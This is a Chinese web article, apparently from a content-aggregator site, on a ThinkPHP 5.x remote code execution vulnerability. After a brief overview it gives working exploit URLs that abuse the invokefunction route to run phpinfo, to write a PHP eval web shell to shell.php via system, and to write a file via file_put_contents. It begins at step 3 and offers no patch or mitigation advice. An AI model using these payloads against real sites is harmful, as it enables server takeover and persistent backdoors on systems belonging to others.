thinkphp远程执行命令漏洞

来源：动视网责编：小采时间：2020-11-03 12:31:32

thinkphp远程执行命令漏洞

thinkphp远程执行命令漏洞:漏洞概况ThinkPHP是一款国内流行的开源PHP框架，近日被爆出存在可能的远程代码执行漏洞，攻击者可向缓存文件内写入PHP代码，导致远程代码执行。虽然该漏洞利用需要有几个前提条件，但鉴于国内使用ThinkPHP框架的站点数量之多，该漏洞还是存在一定的影响范围。

推荐度：

点击下载本文 文档为doc格式

导读thinkphp远程执行命令漏洞:漏洞概况ThinkPHP是一款国内流行的开源PHP框架，近日被爆出存在可能的远程代码执行漏洞，攻击者可向缓存文件内写入PHP代码，导致远程代码执行。虽然该漏洞利用需要有几个前提条件，但鉴于国内使用ThinkPHP框架的站点数量之多，该漏洞还是存在一定的影响范围。

3、通过phpinfo函数写出phpinfo()的信息：

http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

4、写入shell：

http://localhost/thinkphp5.1/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

或

http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>

推荐教程：《TP5》

thinkphp远程执行命令漏洞

推荐度：

点击下载本文 文档为doc格式

标签：远程 php 脚本

热门焦点

thinkphp远程执行命令漏洞

thinkphp远程执行命令漏洞

thinkphp远程执行命令漏洞

最新推荐

猜你喜欢

热门推荐